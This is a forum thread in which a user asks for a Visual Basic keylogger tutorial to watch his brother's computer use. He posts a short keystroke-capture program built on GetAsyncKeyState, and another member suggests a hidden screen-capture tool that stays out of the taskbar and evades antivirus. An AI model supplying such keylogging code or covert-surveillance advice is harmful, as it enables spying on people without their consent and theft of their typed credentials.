473,385 Members | 1,712 Online
Bytes | Software Development & Data Engineering Community
Post Job

Home Posts Topics Members FAQ

Join Bytes to post your question to a community of 473,385 software developers and data experts.

Does anyone have a VB Keylogger Tutorial?

Does anyone have a tutorial they could give me or post on how to make a keylogger to monitor my computer because my brother also uses it.... i dont want just the code for one, i want to understand how the VB code for it works also so i can get a feel for it... Thanx
Jan 29 '08 #1
10 4111
YarrOfDoom
1,247 Expert 1GB
I don't think keylogging is the best way to find out such things. See if you can find something in your logbooks, or if you have Vista, use parental control.
Jan 29 '08 #2
I don't think keylogging is the best way to find out such things. See if you can find something in your logbooks, or if you have Vista, use parental control.

Ya but i also wanna understand how one is made too... and with parental controls it blocks most of the normal sites that are approved for him so im really looking into a keylogger tutorial for vb
Jan 29 '08 #3
jamesd0142
469 256MB
Your intentions may be innocent but it's unlikely anyone here will help or supply code for you to create a keylogger...

They're kind of frowned upon in the programming world.
Jan 30 '08 #4
Killer42
8,435 Expert 8TB
...They're kind of frowned upon in the programming world.
That's right. And any decent anti-malware software should detect and disable the keylogger if you do get it working.

Keyloggers are unpopular because they are a favourite way for hackers to gather critical information such as passwords, credit card details, and so on. So don't be surprised if you encounter some pretty hostile reactions in this particular quest for knowledge.
Jan 30 '08 #5
OHHH, no way! I just want to montior what goes on on my computer, I hope people will understand that... Thanx for the clarification
Jan 30 '08 #6
Well I went looking and I found a semi-keylogger, it's not for destructive use, but rather for experimenting.... here is the code.....

Expand|Select|Wrap|Line Numbers
  1. Public Class Form1
  2.     Dim result As Integer
  3.     Dim i As Double
  4.     Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Integer) As Integer
  5.  
  6.  
  7.     Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
  8.         Timer1.Interval = 10
  9.         Timer1.Enabled = True
  10.     End Sub
  11.  
  12.     Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
  13.         For i = 32 To 128
  14.             result = 0
  15.             result = GetAsyncKeyState(i)
  16.  
  17.  
  18.             If result = -32767 Then
  19.                 TextBox1.Text = TextBox1.Text + Chr(i)
  20.             End If
  21.         Next i
  22.     End Sub
  23.  
  24.     Private Sub Button1_Click_1(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
  25.         TextBox1.Text = ""
  26.     End Sub
  27. End Class
Can someone please break it down for me, because it's not malicious or hidden, it's for everyone to see on the screen. I want to understand the script better.

But if anyone does have a tutorial can they please send it to me, because it's important to me that I don't have my brother doing inappropriate things on the computer, he's a wild kid and hard to handle at times... ANY HELP would be greatly appreciated! Thanks guys!
Jan 30 '08 #7
daniel aristidou
491 256MB
Hey...instead of making .....a keylogger...why not make a program that captures the screen...every so often and stores it.....that way...you don't have to rely on what he types ...and an antivirus (etc) will probably not disable it........
It also gives you a beeter idea as to what is actually going on...also if your using vb08...i would make the form opacity =0% make it not appear in the taskbar add a icon in the tool tray that has a context menu that enables you to restore the opacity to 100% if you enter the correct password...
To capture the screan...there are already some post on this....use the seach at the top of the screen....
Jan 30 '08 #8
Hey...instead of making .....a keylogger...why not make a program that captures the screen...every so often and stores it.....that way...you don't have to rely on what he types ...and an antivirus (etc) will probably not disable it........
It also gives you a beeter idea as to what is actually going on...also if your using vb08...i would make the form opacity =0% make it not appear in the taskbar add a icon in the tool tray that has a context menu that enables you to restore the opacity to 100% if you enter the correct password...
To capture the screan...there are already some post on this....use the seach at the top of the screen....
Yea, i think thats a good idea man, but itll probably take up a lot of space if it captures the sceen often... :-(
Jan 30 '08 #9
daniel aristidou
491 256MB
Yea, i think thats a good idea man, but itll probably take up a lot of space if it captures the sceen often... :-(
Well you can all ways delete the pictures after you view them.....any way i should think 5min intervals is good enough
Jan 30 '08 #10
Well you can all ways delete the pictures after you view them.....any way i should think 5min intervals is good enough

OK well thanx alot man!
Jan 30 '08 #11

Sign in to post your reply or Sign up for a free account.

Similar topics

12
by: Jay | last post by:
ok, i thought for 2 seconds i might have created a Keylogger in python but i still have one major think stopping me... PYTHON. when i run the program i have python create a file named keylog2.log...
2
by: Du Dang | last post by:
i wanna use keys combo to show and hide my app could someone show me how to capture global key strokes ??? essentially it behave like a keylogger program, but it not :-) thanks
5
by: Florence HENRY | last post by:
Hello, well, almost everything is in the subject ! I have to fill 2 tables (more complicated than in the example !): CREATE TABLE A ( id serial primary key, foo text);
5
by: spookyu | last post by:
Alright, I'm sure your tired to hearing this but...does anyone know of any GOOD tutorial's for learning c#. The more basic the better, I have NO experience with programing before this other than...
4
by: cj | last post by:
My company just purchased SocketTools Visual Edition from Catalyst with the intent that I would use the included Socketwrench tool to create a server application to receive and respond to requests...
1
by: RC | last post by:
KML is Google Map version of XML I tried some example here http://earth.google.com/kml/index.html with my data, but doesn't work. The tutorial there is not so good neigther. Is there a...
11
by: CodeLeon | last post by:
Hi. I would like to create a keylogger, are there any good tutorials? Also, more importantly, how do i hide this process from the task manager? NO, i am not a virus writer, so PLEASE no messages...
8
by: Sandy Tipper | last post by:
I have never had a textarea content change, in any browser. On several different projects. With javascript enabled (other stuff works.) I have read lots, and everyone says it should work. Can...
3
by: NickNeedsHelp | last post by:
Hey, my name's Nick, and I seriously need some help. One of my friends has been dating his girlfriend for coming up 2 years now, and recently there's been way too many rumours around school she's...
0
by: taylorcarr | last post by:
A Canon printer is a smart device known for being advanced, efficient, and reliable. It is designed for home, office, and hybrid workspace use and can also be used for a variety of purposes. However,...
0
by: Charles Arthur | last post by:
How do i turn on java script on a villaon, callus and itel keypad mobile phone
0
by: ryjfgjl | last post by:
If we have dozens or hundreds of excel to import into the database, if we use the excel import function provided by database editors such as navicat, it will be extremely tedious and time-consuming...
0
by: ryjfgjl | last post by:
In our work, we often receive Excel tables with data in the same format. If we want to analyze these data, it can be difficult to analyze them because the data is spread across multiple Excel files...
0
BarryA
by: BarryA | last post by:
What are the essential steps and strategies outlined in the Data Structures and Algorithms (DSA) roadmap for aspiring data scientists? How can individuals effectively utilize this roadmap to progress...
1
by: nemocccc | last post by:
hello, everyone, I want to develop a software for my android phone for daily needs, any suggestions?
1
by: Sonnysonu | last post by:
This is the data of csv file 1 2 3 1 2 3 1 2 3 1 2 3 2 3 2 3 3 the lengths should be different i have to store the data by column-wise with in the specific length. suppose the i have to...
0
by: Hystou | last post by:
There are some requirements for setting up RAID: 1. The motherboard and BIOS support RAID configuration. 2. The motherboard has 2 or more available SATA protocol SSD/HDD slots (including MSATA, M.2...
0
jinu1996
by: jinu1996 | last post by:
In today's digital age, having a compelling online presence is paramount for businesses aiming to thrive in a competitive landscape. At the heart of this digital strategy lies an intricately woven...

By using Bytes.com and it's services, you agree to our Privacy Policy and Terms of Use.

To disable or enable advertisements and analytics tracking please visit the manage ads & tracking page.